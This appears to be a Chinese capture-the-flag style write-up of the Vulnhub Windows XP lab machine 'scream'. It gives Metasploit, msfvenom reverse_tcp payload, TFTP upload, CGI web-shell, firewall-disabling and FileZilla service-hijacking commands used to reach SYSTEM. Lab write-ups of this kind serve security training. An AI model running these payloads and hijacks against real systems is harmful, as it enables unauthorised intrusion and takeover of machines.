Vulnhub靶机：scream

一、介绍

运行环境：Virtualbox(攻击机)和VMware(靶机)

攻击机：kali（192.168.56.101）

靶机：/dev/random: scream（192.168.56.110）

目标：获取靶机root权限和flag

靶机下载地址：https://www.vulnhub.com/entry/devrandom-scream,47/

靶机下载到的是一个exe文件，靶机作者制作靶机时采用的方式为使用ISO镜像修改程序将漏洞写入操作系统安装镜像，因此我们需要自行准备Windows XP操作系统的安装文件并使用镜像修改工具制作安装光盘。

首先下载Windows XP操作系统的安装光盘，要求如下：

32位操作系统
Windows XP Home/Professional Editon
Service Pack 2/3

下载好Windows XP操作系统，打开scream.exe

在这里插入图片描述

点击Source区块内文本输入框旁边的光盘按钮，选中Windows XP的安装光盘，随后将压缩包内key.txt的激活码填入Product Key内的文本输入框，点击Generate Image按钮，即可生成镜像文件。

在这里插入图片描述

镜像文件生成后，按照正常的步骤在虚拟机软件中添加Windows XP虚拟机即可。制作好的镜像无需进行手动操作即可自动安装。

这里有大佬已经配置好的虚拟机镜像：https://pan.baidu.com/s/13N52UQs3b6NUBFqZ1tok7w?pwd=p4y9

（发现自己制作的镜像80端口没开放，而网上配置好的镜像会开放80端口，我这里使用上面链接下载的镜像）

二、信息收集

使用nmap主机发现靶机ip：192.168.56.111

在这里插入图片描述

使用nmap端口扫描发现靶机开放端口：21、22、23、80

nmap -A 192.168.56.111 -p 1-65535

在这里插入图片描述

21端口：根据nmap的扫描结果，ftp存在匿名登录。在Kali Linux中打开系统自带的 Thuner文件管理器，在地址栏输入ftp://192.168.2.142，随后在弹出的窗口中选择匿名连接并点击确定，即可连接靶机的FTP服务：

在这里插入图片描述

查看靶机各个目录的文件，/root/目录可能是web网站的根目录

在这里插入图片描述

22端口：根据nmap扫描结果ssh的banner信息为：WeOnlyDo sshd 2.1.3

23端口：什么信息都没有发现

80端口：打开网站未发现什么功能点，查看源码也没有发现什么隐藏信息

在这里插入图片描述

使用dirsearch目录爆破，也没有发现什么东西

在这里插入图片描述

使用searchsploit搜索sshd 2.1.3的历史漏洞，发现远程身份验证绕过漏洞：CVE-2012-6066

在这里插入图片描述

使用msfconsole进行漏洞利用

msfconsole
use exploit/windows/ssh/freesshd_authbypass
set rhosts 192.168.56.111
set LHOST 192.168.56.101
run

在这里插入图片描述

漏洞利用失败，看报错应该是ssh链接的问题，靶机的ssh版本太低了

攻击机连接靶机的ssh失败，需要添加-oKexAlgorithms=+diffie-hellman-group1-sha1 -oHostKeyAlgorithms=+ssh-dss -oCiphers=+3des-cbc

ssh -l root 192.168.56.111 -oKexAlgorithms=+diffie-hellman-group1-sha1 -oHostKeyAlgorithms=+ssh-dss -oCiphers=+3des-cbc

在这里插入图片描述

后面参考了一下网上的wp，靶机还开放了UDP端口，nmap扫描默认是TCP扫描，扫描不出来UDP端口

使用参数-sU进行UDP扫描，发现端口：69

nmap -sU 192.168.56.111 -p 1-65535

在这里插入图片描述

69端口：tftp服务，可以尝试上传文件到靶机

tftp 192.168.56.111
put a.txt

在这里插入图片描述

没有提示是否上传成功，我们匿名登录ftp，发现a.txt上传成功

在这里插入图片描述

三、漏洞利用

使用TFTP上传一句话木马试试，浏览器访问发现服务器无法解析php

在这里插入图片描述

根据之前ftp看到的，网站有一个/cgi-bin/目录用来存放gui程序，我们可以上传一个GUI后门文件：https://github.com/rafalrusin/web-shell

put cgiwebshell.pl cgi-bin/cgi_webshell.pl

浏览器访问密码为yourpassword：http://192.168.56.111/cgi-bin/cgi_webshell.pl?password=yourpassword

在这里插入图片描述

执行dir命令

在这里插入图片描述

四、提权

使用ping命令探测，发现靶机可能开了防火墙

ping 192.168.56.111 -c 10

在这里插入图片描述

使用命令查看防火墙是否开启

netsh firewall show state

在这里插入图片描述

将防火墙关闭

net stop sharedaccess

在这里插入图片描述

再次ping测试，防火墙被成功关闭

在这里插入图片描述

使用msfvenom生成木马进行远程控制靶机

msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.56.101 lport=4444  -f exe -o  shell.exe

在这里插入图片描述

使用tftp将木马上传到靶机

tftp 192.168.56.111
put shell.exe cgi-bin/reverse_shell.exe

在这里插入图片描述

攻击机使用msfconsole进行监听

msfconsole
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set LHOST 192.168.56.101
set LPORT 4444
exploit

在这里插入图片描述

使用webshell启动上传的木马文件，发现启动失败

reverse_shell.exe

在这里插入图片描述

后面发现使用TFTP上传可执行文件，必须将传输模式切换为binary，否则TFTP会上传纯文本，重新上传shell

tftp 192.168.56.111
binary
put shell.exe cgi-bin/shell.exe

在这里插入图片描述

使用webshell启动上传的木马文件，链接成功

shell.exe

在这里插入图片描述

查看当前的权限，为普通用户权限

在这里插入图片描述

1、getsystem提权

getsystem提权原理：

1.创建一个以system权限启动的程序，这个程序的作用是连接指定的命名管道。
2.创建一个进程，并让进程创建命名管道。
3.让之前的以system权限启动的程序启动并连接这个命名管道。
4.利用ImpersonateNamedPipeClient()函数生成system权限的token。
5.利用system权限的token启动cmd.exe。

参考：msf的getsystem命令原理与windows命名管道_msf getsystem-CSDN博客

执行getsystem命令，直接得到system权限

在这里插入图片描述

2、内核漏洞提权（失败）

查看操作系统信息：systeminfo

在这里插入图片描述

将得到的信息保存到systeminfo.txt，使用windows-exploit-suggester对比补丁信息，来查看靶机存在哪些漏洞

python2 windows-exploit-suggester.py --database 2024-04-01-mssb.xls --systeminfo systeminfo.txt

在这里插入图片描述

存在ms13_053漏洞，在msf搜索对应的模块

search ms13_053

在这里插入图片描述

使用改模块进行提权，提权失败

use exploit/windows/local/ms13_053_schlamperei
set SESSION 5
set LHOST 192.168.56.101
exploit

在这里插入图片描述

不清楚是什么原因，尝试过其他漏洞也是这种情况

3、服务劫持提权

使用命令列出系统进程列表

tasklist /V

在这里插入图片描述

发现下面三个服务存在NT AUTHORITY\SYSTEM权限

FileZilla server.exe
FreeSSHDService.exe
OpenTFTPServerMT.exe

可以尝试替换服务程序来进行提权限

使用net start命令看看系统正在运行的服务列表
在这里插入图片描述

高权限进程对应系统服务列表

进程	服务
FreeSSHDService.exe	FreeSSHDService
OpenTFTPServerMT.exe	Open TFTP Server, MultiThreaded
FileZilla server.exe	FileZilla Server FTP server

我们选择ftp服务进行提权

使用命令查询FTP服务状态：

sc query "FileZilla Server FTP server"

在这里插入图片描述

查询失败，直接试试停止该服务：

net stop "FileZilla Server FTP server"

在这里插入图片描述

寻找FileZilla server.exe的绝对路径，为：C:\Program Files\FileZilla Server\FileZilla server.exe

cd C:\
dir /s | findstr "FileZilla server.exe"

在这里插入图片描述

生成新的木马并上传

msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.56.101 lport=8888  -f exe -o  shell2.exe
tftp 192.168.56.111
binary
put shell2.exe

在这里插入图片描述

替换FTP程序文件名，劫持的ftp服务

cd C:\www\root
move ".\shell2.exe" "C:\Program Files\FileZilla Server\shell2.exe" 
cd "C:\Program Files\FileZilla Server\"
move "FileZilla server.exe" "FileZilla server.exe.backup"
move ".\shell2.exe" "FileZilla server.exe"

在这里插入图片描述

攻击机进行监听

msfconsole
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set LHOST 192.168.56.101
set LPORT 8888
exploit

重新启动服务

net start "FileZilla Server FTP server"

在这里插入图片描述

得到NT AUTHORITY\SYSTEM权限

在这里插入图片描述

参考链接：https://juejin.cn/post/7299050263745953833

本文来自互联网用户投稿，该文观点仅代表作者本人，不代表本站立场。本站仅提供信息存储空间服务，不拥有所有权，不承担相关法律责任。如若转载，请注明出处：/a/510657.html

如若内容造成侵权/违法违规/事实不符，请联系我们进行投诉反馈qq邮箱809451989@qq.com，一经查实，立即删除！